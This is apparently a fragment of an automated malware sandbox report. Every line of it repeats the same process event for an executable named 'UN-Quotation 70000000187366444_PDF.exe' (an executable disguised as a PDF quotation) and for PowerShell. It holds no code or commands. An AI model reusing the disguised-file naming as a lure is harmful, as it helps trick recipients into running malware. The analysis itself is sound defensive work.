                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
